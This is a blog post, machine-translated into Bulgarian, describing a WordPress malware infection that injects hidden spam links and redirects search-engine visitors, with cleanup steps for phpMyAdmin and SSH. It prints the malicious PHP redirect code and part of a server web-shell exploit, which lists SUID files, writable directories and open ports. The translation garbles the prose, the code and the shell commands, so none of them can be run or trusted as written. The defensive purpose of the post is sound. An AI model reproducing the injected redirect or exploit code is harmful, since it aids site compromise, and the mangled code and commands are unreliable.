Блогосферата е уловил бъг ... но ми се, че сте имали?

През последния месец, че сте получили предупреждения вируса блог в някои посетители. Първоначално I игнорира предупрежденията, защото инсталира доста добра антивирусна (Kaspersky AV 2009) И въпреки че в блога за дълго време, никога не съм се вирус предупреждение (.. видях нещо подозрително по-рано, че първото опресняване изчезна. Накрая ...).
Бавно започнаха да се появяват големи вариации посетител трафикСлед което трафика напоследък е паднал постоянно и започна да се все повече и повече хора, които ми казват, че stealthsettings.com е virused. Вчера получих от някой, на екрана се прави, когато антивирусен блокира писменост на stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Тя беше доста убедителни за мен, че сложих всички източници избраните. Първата идея, която ми хрумна е да се направи ъпгрейд най-новата версия на WordPress (2.5.1), но не преди стар скрипт, за да изтриете всички файлове на WordPress и да направи резервната база данни. Тази процедура е била неуспешна и вероятно щеше да отнеме много време, за да разбера сема когато заври, ако бих казал в дискусия с чаша кафе, той открил Google и би било добре да го види.
MyDigitalLife.info, публикува статия, озаглавена: "WordPress Hack: Възстановяване и определи Google и търсачка или Не Cookie трафик пренасочен към Your-Needs.info, AnyResults.Net, Golden-Info.net и други незаконни сайтове"Това е краят на конеца, имах нужда.
Става дума за използват WordPress основава на бисквитка, Което според мен е много сложна и направи книгата. Достатъчно умен, за да се направи SQL Injection База данни на блога, да се създаде една невидима потребителя лесна проверка на рутинна Табло->Потребители, проверка на сървъра директории и файлове "писане" (С коригирате 777), да търси и изпълнявам файлове с привилегиите на корен потребител или група. Аз не знам кой използва името и видите, че има няколко статии, написани за него, въпреки факта, че много блогове са заразени, включително Румъния. Добре ... Ще се опитам да се опитам да обясня общи за вируса.

Какво е вирус?

Първо, поставете източници страници за блогове, линкове невидими за посетителите, но видимо и индексиране за търсачките, особено Google. По този начин прехвърляте страница ранг към сайтове, посочени от нападателя. От друга страна, се добавя пренасочване код URL за посетители, идващи от Google, Live, Yahoo, ... или RSS четец, а не на сайта курабийка. A антивирусен разпознава като пренасочване Trojan-Clicker.HTML.

Симптоми:

Massive спад на посетител трафик, Особено в блогове, където повечето посетители идват от Google.

Идентификация: (Оттук става проблем за тези, които не знаят как как да PhpMyAdmin, PHP и Linux)

LA. ВНИМАНИЕ! Първо направете резервната база данни!

1. Проверка на изходните файлове index.php, header.php, footer.php, The блог тема и да видим дали има код, който използва шифроване base64 или съдържа "ако ($ ДОИ ==" 1 && sizeof ($ _COOKIE) == 0?) "форма:

<? Php
$ Шереф = масив ("Google", "MSN", "живеят", "AltaVista"
"Ask", "Yahoo", "AOL", "CNN", "време", "Алекса");
$ Ser = 0; foreach ($ Шереф като $ код)
ако (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ код) == фалшиви) {$ SER = "1;? Break;}!
ако ($ ДОИ == "1 && sizeof ($ _COOKIE) == 0?) {глава (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / ") излизане;
}>

... Или нещо такова. Изтрий този код!

Кликнете върху изображението ...

Индексът код

На снимката по-горе съм избрал подредба и "<Php get_header ();?>". Този код трябва да остане.

2. Употреба PhpMyAdmin и да отидете в таблица от база данни wp_usersКогато проверите, ако няма потребителско име създадена на 00:00:00 0000-00-00 (Възможни разположение user_login напишете "WordPress". Добави този потребител ID (поле ID) и след това да го изтриете.

Кликнете върху изображението ...

фалшив потребител

* Зелената линия трябва да бъдат отстранени и запазил ID. В случай на Беше ID = 8 .

3. Отиди до масата wp_usermeta, Къде да разположен и неговата премахване линии за ID (когато полето user_id ID стойност се появява заличава).

4. В таблица wp_option, Отиди на active_plugins и да видим какво плъгин е активиран заподозрян. Може да се използва като окончания _old.giff, _old.pngg, _old.jpeg, _new.php.giffИ т.н. Разширения комбинации с _old и _new фалшив образ.

SELECT * FROM WHERE wp_options option_name = 'active_plugins "

Изтрий този плъгин, след това отидете в блога -> Dashboard -> Plugins, които деактивирате и активирате определен плъгин.

Кликнете върху изображението, за да видите, че се появява active_plugins вирус файл.

плъгин

Следвайте пътя на FTP или SSH, посочени в active_plugins и изтриете файла от сървъра.

5. Всички в PhpMyAdmin, в таблица wp_option, Намиране и изтриване на ред, съдържащ "rss_f541b3abd05e7962fcab37737f40fad8"И сред"internal_links_cache ".
В internal_links_cache са криптирани връзки спам, които се появяват в блога си и Google Adsense код, Хакер.

6. Препоръчително е да се смените паролата Блог и вход премахнете всички подозрителни userele. Upgrade до най-новата версия на WordPress и настроите блог, за да не се допуска регистрация на нови потребители. Няма загуба ... не мога да коментирам и нелогично.

Опитах се да обясня по-горе малко, какво да се прави в такава ситуация да се чисти този блог вирус. Проблемът е по-сериозен, отколкото изглежда и почти решен, които се използват уязвимости в сигурността на уеб сървър хостинг, който е блог.

Като първа мярка за сигурност, с достъп SSH, Направете някои проверки на сървъра, за да видите дали някои файлове като * _old * и * _new. * С окончания.giff,. JPEG,. pngg,. jpgg. Тези файлове трябва да бъдат заличени. Ако преименувате даден файл, например. top_right_old.giff in top_right_old.phpНие виждаме, че файлът е точно сървъра експлойт код.

Някои полезни указания за проверка, почистване и сървър за сигурност. (Via SSH)

1. CD / TMP и проверете дали има папки като tmpVFlma или други комбинации има същото име и да го изтриете. Вижте снимката по-долу, две такива папки от мен:

tmpserver

RM-RF FOLDERNAME

2. Проверете elimiati (коригирате промени) като възможни атрибути папки коригират 777

намерите всички записваеми файлове в текущата директория: Намери. -Type F-къдрене-2-LS
намерите всички записваеми директории в текущата директория: Намери. -Type г-къдрене-2-LS
намерите всички записваеми директории и файлове в текущата директория: Намери. -Перм-2-LS

3. Търся подозрителни файлове на сървъра.

Намери. -Наименование "* _new.php *"
Намери. -Наименование "* _old.php *"
Намери. -Име "*. Jpgg"
Намери. -Name "* _giff"
Намери. -Name "* _pngg"

4, ВНИМАНИЕ! файловете, които са били определени битов SUID si SGID. Тези файлове се изпълняват с правата на потребител (група) или корен, а не на потребителя, който изпълни файла. Тези файлове може да доведе до корен компромис, ако проблемите на сигурността. Ако използвате файлове с SUID и SGID бита, изпълнява "коригират 0 " на или деинсталирате пакета, които ги съдържат.

Подвиг съдържа някъде в източник ...:

ако (! $ safe_mode) {
ако ($ os_type == "Никс") {
$ Os = Execute ("Sysctl-н kern.ostype").;
$ Os = Execute ("Sysctl-н kern.osrelease").;
$ Os = Execute ("Sysctl-н kernel.ostype").;
$ Os = Execute ("Sysctl-н kernel.osrelease").;
ако (празна ($ потребител)) Потребителят $ = изпълнение ("ID");
$ Псевдоними = масив (
"=>",
"Намерете SUID файлове '=>' Търсене / тип F-къдрене-04000-LS",
"Намерете SGID файлове '=>' Търсене / тип F-къдрене-02000-ли",
"Вижте всички записваеми файлове в текущата директория '=>' намерите. -Type F-къдрене-2-ли ",
"Вижте всички записваеми директории в текущата директория '=>' намерите. -Type г-къдрене-2-ли ",
"Вижте всички записваеми директории и файлове в текущата директория '=>' намерите. -Перм-2-ли ",
"Покажи отвори пристанищата '=>' NETSTAT-на | Впиши-и слушам",
);
Останало {}
. $ Os_name = Execute ("версия");
Потребителят $ = Execute ("ехо%% потребителско име").;
$ Псевдоними = масив (
"=>",
"Покажи стъпало услуги '=>' нетната старт"
"Покажи списък процес '=>' Списъкът със задачи"
);
}

По този начин ... основно установи нарушения в сигурността. Пристанища, отворени директории "писане" и група за изпълнение привилегии файлове / корен.

Обратно с повече ...

Някои заразени блогове: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / блог,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / блог /,

www.mirabilismedia.ro / блог, Blog.einvest.ro
... Списъкът продължава ... много.

Можете да проверите дали един блог е вирус, използвайки Google търсачката. копие & паста:

сайт www.blegoo.com изкупуване

Лека нощ и увеличаване на работа ;) Скоро ще излезе с новини Eugen на prevezibil.imprevizibil.com.

BRB :)

TO: ВНИМАНИЕ! Промяна WordPress тема или ъпгрейд към WordPress 2.5.1, а не решение да се отърват от този вирус.

Блогосферата е уловил бъг ... но ми се, че сте имали?

За автора

Хитрост

Страстен за всичко, което приспособление и го напиша с удоволствие stealthsettings.com на 2006 и обичам да откривам нови неща с вас за компютри и MacOS, Linux, Windows, IOS и Android.

Оставете коментар

Този сайт използва Akismet за намаляване на спама. Научете как се обработват данните за коментарите ви.